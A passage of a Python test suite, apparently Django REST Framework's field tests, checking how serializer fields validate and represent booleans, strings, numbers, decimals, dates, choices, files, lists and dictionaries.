published = serializers.HiddenField(default=default)
text = serializers.CharField()
self.Serializer = TestSerializer
def test_create_only_default_is_provided(self):
serializer = self.Serializer(data={'text': 'example'})
assert serializer.is_valid()
assert serializer.validated_data == {
'text': 'example', 'published': '2001-01-01'
}
def test_create_only_default_is_not_provided_on_update(self):
instance = {
'text': 'example', 'published': '2001-01-01'
}
serializer = self.Serializer(instance, data={'text': 'example'})
assert serializer.is_valid()
assert serializer.validated_data == {
'text': 'example',
}
def test_create_only_default_callable_sets_context(self):
"""
CreateOnlyDefault instances with a callable default should set_context
on the callable if possible
"""
class TestCallableDefault:
def set_context(self, serializer_field):
self.field = serializer_field
def __call__(self):
return "success" if hasattr(self, 'field') else "failure"
class TestSerializer(serializers.Serializer):
context_set = serializers.CharField(default=serializers.CreateOnlyDefault(TestCallableDefault()))
serializer = TestSerializer(data={})
assert serializer.is_valid()
assert serializer.validated_data['context_set'] == 'success'
# Tests for field input and output values.
# ----------------------------------------
def get_items(mapping_or_list_of_two_tuples):
# Tests accept either lists of two tuples, or dictionaries.
if isinstance(mapping_or_list_of_two_tuples, dict):
# {value: expected}
return mapping_or_list_of_two_tuples.items()
# [(value, expected), ...]
return mapping_or_list_of_two_tuples
class FieldValues:
"""
Base class for testing valid and invalid input values.
"""
def test_valid_inputs(self):
"""
Ensure that valid values return the expected validated data.
"""
for input_value, expected_output in get_items(self.valid_inputs):
assert self.field.run_validation(input_value) == expected_output
def test_invalid_inputs(self):
"""
Ensure that invalid values raise the expected validation error.
"""
for input_value, expected_failure in get_items(self.invalid_inputs):
with pytest.raises(serializers.ValidationError) as exc_info:
self.field.run_validation(input_value)
assert exc_info.value.detail == expected_failure
def test_outputs(self):
for output_value, expected_output in get_items(self.outputs):
assert self.field.to_representation(output_value) == expected_output
# Boolean types...
class TestBooleanField(FieldValues):
"""
Valid and invalid values for `BooleanField`.
"""
valid_inputs = {
'true': True,
'false': False,
'1': True,
'0': False,
1: True,
0: False,
True: True,
False: False,
}
invalid_inputs = {
'foo': ['"foo" is not a valid boolean.'],
None: ['This field may not be null.']
}
outputs = {
'true': True,
'false': False,
'1': True,
'0': False,
1: True,
0: False,
True: True,
False: False,
'other': True
}
field = serializers.BooleanField()
def test_disallow_unhashable_collection_types(self):
inputs = (
[],
{},
)
field = serializers.BooleanField()
for input_value in inputs:
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation(input_value)
expected = ['"{0}" is not a valid boolean.'.format(input_value)]
assert exc_info.value.detail == expected
class TestNullBooleanField(FieldValues):
"""
Valid and invalid values for `BooleanField`.
"""
valid_inputs = {
'true': True,
'false': False,
'null': None,
True: True,
False: False,
None: None
}
invalid_inputs = {
'foo': ['"foo" is not a valid boolean.'],
}
outputs = {
'true': True,
'false': False,
'null': None,
True: True,
False: False,
None: None,
'other': True
}
field = serializers.NullBooleanField()
# String types...
class TestCharField(FieldValues):
"""
Valid and invalid values for `CharField`.
"""
valid_inputs = {
1: '1',
'abc': 'abc'
}
invalid_inputs = {
(): ['Not a valid string.'],
True: ['Not a valid string.'],
'': ['This field may not be blank.']
}
outputs = {
1: '1',
'abc': 'abc'
}
field = serializers.CharField()
def test_trim_whitespace_default(self):
field = serializers.CharField()
assert field.to_internal_value(' abc ') == 'abc'
def test_trim_whitespace_disabled(self):
field = serializers.CharField(trim_whitespace=False)
assert field.to_internal_value(' abc ') == ' abc '
def test_disallow_blank_with_trim_whitespace(self):
field = serializers.CharField(allow_blank=False, trim_whitespace=True)
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation(' ')
assert exc_info.value.detail == ['This field may not be blank.']
class TestEmailField(FieldValues):
"""
Valid and invalid values for `EmailField`.
"""
valid_inputs = {
'[email protected]': '[email protected]',
' [email protected] ': '[email protected]',
}
invalid_inputs = {
'examplecom': ['Enter a valid email address.']
}
outputs = {}
field = serializers.EmailField()
class TestRegexField(FieldValues):
"""
Valid and invalid values for `RegexField`.
"""
valid_inputs = {
'a9': 'a9',
}
invalid_inputs = {
'A9': ["This value does not match the required pattern."]
}
outputs = {}
field = serializers.RegexField(regex='[a-z][0-9]')
class TestSlugField(FieldValues):
"""
Valid and invalid values for `SlugField`.
"""
valid_inputs = {
'slug-99': 'slug-99',
}
invalid_inputs = {
'slug 99': ['Enter a valid "slug" consisting of letters, numbers, underscores or hyphens.']
}
outputs = {}
field = serializers.SlugField()
class TestURLField(FieldValues):
"""
Valid and invalid values for `URLField`.
"""
valid_inputs = {
'http://example.com': 'http://example.com',
}
invalid_inputs = {
'example.com': ['Enter a valid URL.']
}
outputs = {}
field = serializers.URLField()
class TestUUIDField(FieldValues):
"""
Valid and invalid values for `UUIDField`.
"""
valid_inputs = {
'825d7aeb-05a9-45b5-a5b7-05df87923cda': uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'),
'825d7aeb05a945b5a5b705df87923cda': uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'),
'urn:uuid:213b7d9b-244f-410d-828c-dabce7a2615d': uuid.UUID('213b7d9b-244f-410d-828c-dabce7a2615d'),
284758210125106368185219588917561929842: uuid.UUID('d63a6fb6-88d5-40c7-a91c-9edf73283072')
}
invalid_inputs = {
'825d7aeb-05a9-45b5-a5b7': ['"825d7aeb-05a9-45b5-a5b7" is not a valid UUID.'],
(1, 2, 3): ['"(1, 2, 3)" is not a valid UUID.']
}
outputs = {
uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'): '825d7aeb-05a9-45b5-a5b7-05df87923cda'
}
field = serializers.UUIDField()
def _test_format(self, uuid_format, formatted_uuid_0):
field = serializers.UUIDField(format=uuid_format)
assert field.to_representation(uuid.UUID(int=0)) == formatted_uuid_0
assert field.to_internal_value(formatted_uuid_0) == uuid.UUID(int=0)
def test_formats(self):
self._test_format('int', 0)
self._test_format('hex_verbose', '00000000-0000-0000-0000-000000000000')
self._test_format('urn', 'urn:uuid:00000000-0000-0000-0000-000000000000')
self._test_format('hex', '0' * 32)
class TestIPAddressField(FieldValues):
"""
Valid and invalid values for `IPAddressField`
"""
valid_inputs = {
'127.0.0.1': '127.0.0.1',
'192.168.33.255': '192.168.33.255',
'2001:0db8:85a3:0042:1000:8a2e:0370:7334': '2001:db8:85a3:42:1000:8a2e:370:7334',
'2001:cdba:0:0:0:0:3257:9652': '2001:cdba::3257:9652',
'2001:cdba::3257:9652': '2001:cdba::3257:9652'
}
invalid_inputs = {
'127001': ['Enter a valid IPv4 or IPv6 address.'],
'127.122.111.2231': ['Enter a valid IPv4 or IPv6 address.'],
'2001:::9652': ['Enter a valid IPv4 or IPv6 address.'],
'2001:0db8:85a3:0042:1000:8a2e:0370:73341': ['Enter a valid IPv4 or IPv6 address.'],
1000: ['Enter a valid IPv4 or IPv6 address.'],
}
outputs = {}
field = serializers.IPAddressField()
class TestIPv4AddressField(FieldValues):
"""
Valid and invalid values for `IPAddressField`
"""
valid_inputs = {
'127.0.0.1': '127.0.0.1',
'192.168.33.255': '192.168.33.255',
}
invalid_inputs = {
'127001': ['Enter a valid IPv4 address.'],
'127.122.111.2231': ['Enter a valid IPv4 address.'],
}
outputs = {}
field = serializers.IPAddressField(protocol='IPv4')
class TestIPv6AddressField(FieldValues):
"""
Valid and invalid values for `IPAddressField`
"""
valid_inputs = {
'2001:0db8:85a3:0042:1000:8a2e:0370:7334': '2001:db8:85a3:42:1000:8a2e:370:7334',
'2001:cdba:0:0:0:0:3257:9652': '2001:cdba::3257:9652',
'2001:cdba::3257:9652': '2001:cdba::3257:9652'
}
invalid_inputs = {
'2001:::9652': ['Enter a valid IPv4 or IPv6 address.'],
'2001:0db8:85a3:0042:1000:8a2e:0370:73341': ['Enter a valid IPv4 or IPv6 address.'],
}
outputs = {}
field = serializers.IPAddressField(protocol='IPv6')
class TestFilePathField(FieldValues):
"""
Valid and invalid values for `FilePathField`
"""
valid_inputs = {
__file__: __file__,
}
invalid_inputs = {
'wrong_path': ['"wrong_path" is not a valid path choice.']
}
outputs = {
}
field = serializers.FilePathField(
path=os.path.abspath(os.path.dirname(__file__))
)
# Number types...
class TestIntegerField(FieldValues):
"""
Valid and invalid values for `IntegerField`.
"""
valid_inputs = {
'1': 1,
'0': 0,
1: 1,
0: 0,
1.0: 1,
0.0: 0,
'1.0': 1
}
invalid_inputs = {
0.5: ['A valid integer is required.'],
'abc': ['A valid integer is required.'],
'0.5': ['A valid integer is required.']
}
outputs = {
'1': 1,
'0': 0,
1: 1,
0: 0,
1.0: 1,
0.0: 0
}
field = serializers.IntegerField()
class TestMinMaxIntegerField(FieldValues):
"""
Valid and invalid values for `IntegerField` with min and max limits.
"""
valid_inputs = {
'1': 1,
'3': 3,
1: 1,
3: 3,
}
invalid_inputs = {
0: ['Ensure this value is greater than or equal to 1.'],
4: ['Ensure this value is less than or equal to 3.'],
'0': ['Ensure this value is greater than or equal to 1.'],
'4': ['Ensure this value is less than or equal to 3.'],
}
outputs = {}
field = serializers.IntegerField(min_value=1, max_value=3)
class TestFloatField(FieldValues):
"""
Valid and invalid values for `FloatField`.
"""
valid_inputs = {
'1': 1.0,
'0': 0.0,
1: 1.0,
0: 0.0,
1.0: 1.0,
0.0: 0.0,
}
invalid_inputs = {
'abc': ["A valid number is required."]
}
outputs = {
'1': 1.0,
'0': 0.0,
1: 1.0,
0: 0.0,
1.0: 1.0,
0.0: 0.0,
}
field = serializers.FloatField()
class TestMinMaxFloatField(FieldValues):
"""
Valid and invalid values for `FloatField` with min and max limits.
"""
valid_inputs = {
'1': 1,
'3': 3,
1: 1,
3: 3,
1.0: 1.0,
3.0: 3.0,
}
invalid_inputs = {
0.9: ['Ensure this value is greater than or equal to 1.'],
3.1: ['Ensure this value is less than or equal to 3.'],
'0.0': ['Ensure this value is greater than or equal to 1.'],
'3.1': ['Ensure this value is less than or equal to 3.'],
}
outputs = {}
field = serializers.FloatField(min_value=1, max_value=3)
class TestDecimalField(FieldValues):
"""
Valid and invalid values for `DecimalField`.
"""
valid_inputs = {
'12.3': Decimal('12.3'),
'0.1': Decimal('0.1'),
10: Decimal('10'),
0: Decimal('0'),
12.3: Decimal('12.3'),
0.1: Decimal('0.1'),
'2E+1': Decimal('20'),
}
invalid_inputs = (
('abc', ["A valid number is required."]),
(Decimal('Nan'), ["A valid number is required."]),
(Decimal('Inf'), ["A valid number is required."]),
('12.345', ["Ensure that there are no more than 3 digits in total."]),
(200000000000.0, ["Ensure that there are no more than 3 digits in total."]),
('0.01', ["Ensure that there are no more than 1 decimal places."]),
(123, ["Ensure that there are no more than 2 digits before the decimal point."]),
('2E+2', ["Ensure that there are no more than 2 digits before the decimal point."])
)
outputs = {
'1': '1.0',
'0': '0.0',
'1.09': '1.1',
'0.04': '0.0',
1: '1.0',
0: '0.0',
Decimal('1.0'): '1.0',
Decimal('0.0'): '0.0',
Decimal('1.09'): '1.1',
Decimal('0.04'): '0.0'
}
field = serializers.DecimalField(max_digits=3, decimal_places=1)
class TestMinMaxDecimalField(FieldValues):
"""
Valid and invalid values for `DecimalField` with min and max limits.
"""
valid_inputs = {
'10.0': Decimal('10.0'),
'20.0': Decimal('20.0'),
}
invalid_inputs = {
'9.9': ['Ensure this value is greater than or equal to 10.'],
'20.1': ['Ensure this value is less than or equal to 20.'],
}
outputs = {}
field = serializers.DecimalField(
max_digits=3, decimal_places=1,
min_value=10, max_value=20
)
class TestNoMaxDigitsDecimalField(FieldValues):
field = serializers.DecimalField(
max_value=100, min_value=0,
decimal_places=2, max_digits=None
)
valid_inputs = {
'10': Decimal('10.00')
}
invalid_inputs = {}
outputs = {}
class TestNoStringCoercionDecimalField(FieldValues):
"""
Output values for `DecimalField` with `coerce_to_string=False`.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
1.09: Decimal('1.1'),
0.04: Decimal('0.0'),
'1.09': Decimal('1.1'),
'0.04': Decimal('0.0'),
Decimal('1.09'): Decimal('1.1'),
Decimal('0.04'): Decimal('0.0'),
}
field = serializers.DecimalField(
max_digits=3, decimal_places=1,
coerce_to_string=False
)
class TestLocalizedDecimalField(TestCase):
@override_settings(USE_L10N=True, LANGUAGE_CODE='pl')
def test_to_internal_value(self):
field = serializers.DecimalField(max_digits=2, decimal_places=1, localize=True)
self.assertEqual(field.to_internal_value('1,1'), Decimal('1.1'))
@override_settings(USE_L10N=True, LANGUAGE_CODE='pl')
def test_to_representation(self):
field = serializers.DecimalField(max_digits=2, decimal_places=1, localize=True)
self.assertEqual(field.to_representation(Decimal('1.1')), '1,1')
def test_localize_forces_coerce_to_string(self):
field = serializers.DecimalField(max_digits=2, decimal_places=1, coerce_to_string=False, localize=True)
self.assertTrue(isinstance(field.to_representation(Decimal('1.1')), six.string_types))
class TestQuantizedValueForDecimal(TestCase):
def test_int_quantized_value_for_decimal(self):
field = serializers.DecimalField(max_digits=4, decimal_places=2)
value = field.to_internal_value(12).as_tuple()
expected_digit_tuple = (0, (1, 2, 0, 0), -2)
self.assertEqual(value, expected_digit_tuple)
def test_string_quantized_value_for_decimal(self):
field = serializers.DecimalField(max_digits=4, decimal_places=2)
value = field.to_internal_value('12').as_tuple()
expected_digit_tuple = (0, (1, 2, 0, 0), -2)
self.assertEqual(value, expected_digit_tuple)
def test_part_precision_string_quantized_value_for_decimal(self):
field = serializers.DecimalField(max_digits=4, decimal_places=2)
value = field.to_internal_value('12.0').as_tuple()
expected_digit_tuple = (0, (1, 2, 0, 0), -2)
self.assertEqual(value, expected_digit_tuple)
class TestNoDecimalPlaces(FieldValues):
valid_inputs = {
'0.12345': Decimal('0.12345'),
}
invalid_inputs = {
'0.1234567': ['Ensure that there are no more than 6 digits in total.']
}
outputs = {
'1.2345': '1.2345',
'0': '0',
'1.1': '1.1',
}
field = serializers.DecimalField(max_digits=6, decimal_places=None)
# Date & time serializers...
class TestDateField(FieldValues):
"""
Valid and invalid values for `DateField`.
"""
valid_inputs = {
'2001-01-01': datetime.date(2001, 1, 1),
datetime.date(2001, 1, 1): datetime.date(2001, 1, 1),
}
invalid_inputs = {
'abc': ['Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]].'],
'2001-99-99': ['Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]].'],
datetime.datetime(2001, 1, 1, 12, 00): ['Expected a date but got a datetime.'],
}
outputs = {
datetime.date(2001, 1, 1): '2001-01-01',
'2001-01-01': '2001-01-01',
six.text_type('2016-01-10'): '2016-01-10',
None: None,
'': None,
}
field = serializers.DateField()
class TestCustomInputFormatDateField(FieldValues):
"""
Valid and invalid values for `DateField` with a custom input format.
"""
valid_inputs = {
'1 Jan 2001': datetime.date(2001, 1, 1),
}
invalid_inputs = {
'2001-01-01': ['Date has wrong format. Use one of these formats instead: DD [Jan-Dec] YYYY.']
}
outputs = {}
field = serializers.DateField(input_formats=['%d %b %Y'])
class TestCustomOutputFormatDateField(FieldValues):
"""
Values for `DateField` with a custom output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.date(2001, 1, 1): '01 Jan 2001'
}
field = serializers.DateField(format='%d %b %Y')
class TestNoOutputFormatDateField(FieldValues):
"""
Values for `DateField` with no output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.date(2001, 1, 1): datetime.date(2001, 1, 1)
}
field = serializers.DateField(format=None)
class TestDateTimeField(FieldValues):
"""
Valid and invalid values for `DateTimeField`.
"""
valid_inputs = {
'2001-01-01 13:00': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
'2001-01-01T13:00': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
'2001-01-01T13:00Z': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
datetime.datetime(2001, 1, 1, 13, 00): datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
# Django 1.4 does not support timezone string parsing.
'2001-01-01T13:00Z': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC())
}
invalid_inputs = {
'abc': ['Datetime has wrong format. Use one of these formats instead: YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HH:MM|-HH:MM|Z].'],
'2001-99-99T99:00': ['Datetime has wrong format. Use one of these formats instead: YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HH:MM|-HH:MM|Z].'],
datetime.date(2001, 1, 1): ['Expected a datetime but got a date.'],
}
outputs = {
datetime.datetime(2001, 1, 1, 13, 00): '2001-01-01T13:00:00',
datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): '2001-01-01T13:00:00Z',
'2001-01-01T00:00:00': '2001-01-01T00:00:00',
six.text_type('2016-01-10T00:00:00'): '2016-01-10T00:00:00',
None: None,
'': None,
}
field = serializers.DateTimeField(default_timezone=timezone.UTC())
class TestCustomInputFormatDateTimeField(FieldValues):
"""
Valid and invalid values for `DateTimeField` with a custom input format.
"""
valid_inputs = {
'1:35pm, 1 Jan 2001': datetime.datetime(2001, 1, 1, 13, 35, tzinfo=timezone.UTC()),
}
invalid_inputs = {
'2001-01-01T20:50': ['Datetime has wrong format. Use one of these formats instead: hh:mm[AM|PM], DD [Jan-Dec] YYYY.']
}
outputs = {}
field = serializers.DateTimeField(default_timezone=timezone.UTC(), input_formats=['%I:%M%p, %d %b %Y'])
class TestCustomOutputFormatDateTimeField(FieldValues):
"""
Values for `DateTimeField` with a custom output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.datetime(2001, 1, 1, 13, 00): '01:00PM, 01 Jan 2001',
}
field = serializers.DateTimeField(format='%I:%M%p, %d %b %Y')
class TestNoOutputFormatDateTimeField(FieldValues):
"""
Values for `DateTimeField` with no output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.datetime(2001, 1, 1, 13, 00): datetime.datetime(2001, 1, 1, 13, 00),
}
field = serializers.DateTimeField(format=None)
class TestNaiveDateTimeField(FieldValues):
"""
Valid and invalid values for `DateTimeField` with naive datetimes.
"""
valid_inputs = {
datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): datetime.datetime(2001, 1, 1, 13, 00),
'2001-01-01 13:00': datetime.datetime(2001, 1, 1, 13, 00),
}
invalid_inputs = {}
outputs = {}
field = serializers.DateTimeField(default_timezone=None)
class TestTimeField(FieldValues):
"""
Valid and invalid values for `TimeField`.
"""
valid_inputs = {
'13:00': datetime.time(13, 00),
datetime.time(13, 00): datetime.time(13, 00),
}
invalid_inputs = {
'abc': ['Time has wrong format. Use one of these formats instead: hh:mm[:ss[.uuuuuu]].'],
'99:99': ['Time has wrong format. Use one of these formats instead: hh:mm[:ss[.uuuuuu]].'],
}
outputs = {
datetime.time(13, 0): '13:00:00',
datetime.time(0, 0): '00:00:00',
'00:00:00': '00:00:00',
None: None,
'': None,
}
field = serializers.TimeField()
class TestCustomInputFormatTimeField(FieldValues):
"""
Valid and invalid values for `TimeField` with a custom input format.
"""
valid_inputs = {
'1:00pm': datetime.time(13, 00),
}
invalid_inputs = {
'13:00': ['Time has wrong format. Use one of these formats instead: hh:mm[AM|PM].'],
}
outputs = {}
field = serializers.TimeField(input_formats=['%I:%M%p'])
class TestCustomOutputFormatTimeField(FieldValues):
"""
Values for `TimeField` with a custom output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.time(13, 00): '01:00PM'
}
field = serializers.TimeField(format='%I:%M%p')
class TestNoOutputFormatTimeField(FieldValues):
"""
Values for `TimeField` with a no output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.time(13, 00): datetime.time(13, 00)
}
field = serializers.TimeField(format=None)
class TestDurationField(FieldValues):
"""
Valid and invalid values for `DurationField`.
"""
valid_inputs = {
'13': datetime.timedelta(seconds=13),
'3 08:32:01.000123': datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123),
'08:01': datetime.timedelta(minutes=8, seconds=1),
datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123): datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123),
3600: datetime.timedelta(hours=1),
}
invalid_inputs = {
'abc': ['Duration has wrong format. Use one of these formats instead: [DD] [HH:[MM:]]ss[.uuuuuu].'],
'3 08:32 01.123': ['Duration has wrong format. Use one of these formats instead: [DD] [HH:[MM:]]ss[.uuuuuu].'],
}
outputs = {
datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123): '3 08:32:01.000123',
}
field = serializers.DurationField()
# Choice types...
class TestChoiceField(FieldValues):
"""
Valid and invalid values for `ChoiceField`.
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'amazing': ['"amazing" is not a valid choice.']
}
outputs = {
'good': 'good',
'': '',
'amazing': 'amazing',
}
field = serializers.ChoiceField(
choices=[
('poor', 'Poor quality'),
('medium', 'Medium quality'),
('good', 'Good quality'),
]
)
def test_allow_blank(self):
"""
If `allow_blank=True` then '' is a valid input.
"""
field = serializers.ChoiceField(
allow_blank=True,
choices=[
('poor', 'Poor quality'),
('medium', 'Medium quality'),
('good', 'Good quality'),
]
)
output = field.run_validation('')
assert output == ''
def test_allow_null(self):
"""
If `allow_null=True` then '' on HTML forms is treated as None.
"""
field = serializers.ChoiceField(
allow_null=True,
choices=[
1, 2, 3
]
)
field.field_name = 'example'
value = field.get_value(QueryDict('example='))
assert value is None
output = field.run_validation(None)
assert output is None
def test_iter_options(self):
"""
iter_options() should return a list of options and option groups.
"""
field = serializers.ChoiceField(
choices=[
('Numbers', ['integer', 'float']),
('Strings', ['text', 'email', 'url']),
'boolean'
]
)
items = list(field.iter_options())
assert items[0].start_option_group
assert items[0].label == 'Numbers'
assert items[1].value == 'integer'
assert items[2].value == 'float'
assert items[3].end_option_group
assert items[4].start_option_group
assert items[4].label == 'Strings'
assert items[5].value == 'text'
assert items[6].value == 'email'
assert items[7].value == 'url'
assert items[8].end_option_group
assert items[9].value == 'boolean'
class TestChoiceFieldWithType(FieldValues):
"""
Valid and invalid values for a `Choice` field that uses an integer type,
instead of a char type.
"""
valid_inputs = {
'1': 1,
3: 3,
}
invalid_inputs = {
5: ['"5" is not a valid choice.'],
'abc': ['"abc" is not a valid choice.']
}
outputs = {
'1': 1,
1: 1
}
field = serializers.ChoiceField(
choices=[
(1, 'Poor quality'),
(2, 'Medium quality'),
(3, 'Good quality'),
]
)
class TestChoiceFieldWithListChoices(FieldValues):
"""
Valid and invalid values for a `Choice` field that uses a flat list for the
choices, rather than a list of pairs of (`value`, `description`).
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'awful': ['"awful" is not a valid choice.']
}
outputs = {
'good': 'good'
}
field = serializers.ChoiceField(choices=('poor', 'medium', 'good'))
class TestChoiceFieldWithGroupedChoices(FieldValues):
"""
Valid and invalid values for a `Choice` field that uses a grouped list for the
choices, rather than a list of pairs of (`value`, `description`).
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'awful': ['"awful" is not a valid choice.']
}
outputs = {
'good': 'good'
}
field = serializers.ChoiceField(
choices=[
(
'Category',
(
('poor', 'Poor quality'),
('medium', 'Medium quality'),
),
),
('good', 'Good quality'),
]
)
class TestChoiceFieldWithMixedChoices(FieldValues):
"""
Valid and invalid values for a `Choice` field that uses a single paired or
grouped.
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'awful': ['"awful" is not a valid choice.']
}
outputs = {
'good': 'good'
}
field = serializers.ChoiceField(
choices=[
(
'Category',
(
('poor', 'Poor quality'),
),
),
'medium',
('good', 'Good quality'),
]
)
class TestMultipleChoiceField(FieldValues):
"""
Valid and invalid values for `MultipleChoiceField`.
"""
valid_inputs = {
(): set(),
('aircon',): set(['aircon']),
('aircon', 'manual'): set(['aircon', 'manual']),
}
invalid_inputs = {
'abc': ['Expected a list of items but got type "str".'],
('aircon', 'incorrect'): ['"incorrect" is not a valid choice.']
}
outputs = [
(['aircon', 'manual', 'incorrect'], set(['aircon', 'manual', 'incorrect']))
]
field = serializers.MultipleChoiceField(
choices=[
('aircon', 'AirCon'),
('manual', 'Manual drive'),
('diesel', 'Diesel'),
]
)
def test_against_partial_and_full_updates(self):
field = serializers.MultipleChoiceField(choices=(('a', 'a'), ('b', 'b')))
field.partial = False
assert field.get_value(QueryDict({})) == []
field.partial = True
assert field.get_value(QueryDict({})) == rest_framework.fields.empty
class TestEmptyMultipleChoiceField(FieldValues):
"""
Invalid values for `MultipleChoiceField(allow_empty=False)`.
"""
valid_inputs = {
}
invalid_inputs = (
([], ['This selection may not be empty.']),
)
outputs = [
]
field = serializers.MultipleChoiceField(
choices=[
('consistency', 'Consistency'),
('availability', 'Availability'),
('partition', 'Partition tolerance'),
],
allow_empty=False
)
# File serializers...
class MockFile:
def __init__(self, name='', size=0, url=''):
self.name = name
self.size = size
self.url = url
def __eq__(self, other):
return (
isinstance(other, MockFile) and
self.name == other.name and
self.size == other.size and
self.url == other.url
)
class TestFileField(FieldValues):
"""
Values for `FileField`.
"""
valid_inputs = [
(MockFile(name='example', size=10), MockFile(name='example', size=10))
]
invalid_inputs = [
('invalid', ['The submitted data was not a file. Check the encoding type on the form.']),
(MockFile(name='example.txt', size=0), ['The submitted file is empty.']),
(MockFile(name='', size=10), ['No filename could be determined.']),
(MockFile(name='x' * 100, size=10), ['Ensure this filename has at most 10 characters (it has 100).'])
]
outputs = [
(MockFile(name='example.txt', url='/example.txt'), '/example.txt'),
('', None)
]
field = serializers.FileField(max_length=10)
class TestFieldFieldWithName(FieldValues):
"""
Values for `FileField` with a filename output instead of URLs.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = [
(MockFile(name='example.txt', url='/example.txt'), 'example.txt')
]
field = serializers.FileField(use_url=False)
# Stub out mock Django `forms.ImageField` class so we don't *actually*
# call into it's regular validation, or require PIL for testing.
class FailImageValidation(object):
def to_python(self, value):
raise serializers.ValidationError(self.error_messages['invalid_image'])
class PassImageValidation(object):
def to_python(self, value):
return value
class TestInvalidImageField(FieldValues):
"""
Values for an invalid `ImageField`.
"""
valid_inputs = {}
invalid_inputs = [
(MockFile(name='example.txt', size=10), ['Upload a valid image. The file you uploaded was either not an image or a corrupted image.'])
]
outputs = {}
field = serializers.ImageField(_DjangoImageField=FailImageValidation)
class TestValidImageField(FieldValues):
"""
Values for an valid `ImageField`.
"""
valid_inputs = [
(MockFile(name='example.txt', size=10), MockFile(name='example.txt', size=10))
]
invalid_inputs = {}
outputs = {}
field = serializers.ImageField(_DjangoImageField=PassImageValidation)
# Composite serializers...
class TestListField(FieldValues):
"""
Values for `ListField` with IntegerField as child.
"""
valid_inputs = [
([1, 2, 3], [1, 2, 3]),
(['1', '2', '3'], [1, 2, 3]),
([], [])
]
invalid_inputs = [
('not a list', ['Expected a list of items but got type "str".']),
([1, 2, 'error'], ['A valid integer is required.']),
({'one': 'two'}, ['Expected a list of items but got type "dict".'])
]
outputs = [
([1, 2, 3], [1, 2, 3]),
(['1', '2', '3'], [1, 2, 3])
]
field = serializers.ListField(child=serializers.IntegerField())
def test_no_source_on_child(self):
with pytest.raises(AssertionError) as exc_info:
serializers.ListField(child=serializers.IntegerField(source='other'))
assert str(exc_info.value) == (
"The `source` argument is not meaningful when applied to a `child=` field. "
"Remove `source=` from the field declaration."
)
def test_collection_types_are_invalid_input(self):
field = serializers.ListField(child=serializers.CharField())
input_value = ({'one': 'two'})
with pytest.raises(serializers.ValidationError) as exc_info:
field.to_internal_value(input_value)
assert exc_info.value.detail == ['Expected a list of items but got type "dict".']
class TestEmptyListField(FieldValues):
"""
Values for `ListField` with allow_empty=False flag.
"""
valid_inputs = {}
invalid_inputs = [
([], ['This list may not be empty.'])
]
outputs = {}
field = serializers.ListField(child=serializers.IntegerField(), allow_empty=False)
class TestUnvalidatedListField(FieldValues):
"""
Values for `ListField` with no `child` argument.
"""
valid_inputs = [
([1, '2', True, [4, 5, 6]], [1, '2', True, [4, 5, 6]]),
]
invalid_inputs = [
('not a list', ['Expected a list of items but got type "str".']),
]
outputs = [
([1, '2', True, [4, 5, 6]], [1, '2', True, [4, 5, 6]]),
]
field = serializers.ListField()
class TestDictField(FieldValues):
"""
Values for `ListField` with CharField as child.
"""
valid_inputs = [
({'a': 1, 'b': '2', 3: 3}, {'a': '1', 'b': '2', '3': '3'}),
]
invalid_inputs = [
({'a': 1, 'b': None}, ['This field may not be null.']),
('not a dict', ['Expected a dictionary of items but got type "str".']),
]
outputs = [
({'a': 1, 'b': '2', 3: 3}, {'a': '1', 'b': '2', '3': '3'}),
]
field = serializers.DictField(child=serializers.CharField())
def test_no_source_on_child(self):
with pytest.raises(AssertionError) as exc_info:
serializers.DictField(child=serializers.CharField(source='other'))
assert str(exc_info.value) == (
"The `source` argument is not meaningful when applied to a `child=` field. "
"Remove `source=` from the field declaration."
)
def test_allow_null(self):
"""
If `allow_null=True` then `None` is a valid input.
"""
field = serializers.DictField(allow_null=True)
output = field.run_validation(None)
assert output is None
class TestDictFieldWithNullChild(FieldValues):
"""
Values for `ListField` with allow_null CharField as child.
"""
valid_inputs = [
({'a': None, 'b': '2', 3: 3}, {'a': None, 'b': '2', '3': '3'}),
]
invalid_inputs = [
]
outputs = [
({'a': None, 'b': '2', 3: 3}, {'a': None, 'b': '2', '3': '3'}),
]
field = serializers.DictField(child=serializers.CharField(allow_null=True))
class TestUnvalidatedDictField(FieldValues):
"""
Values for `ListField` with no `child` argument.
"""
valid_inputs = [
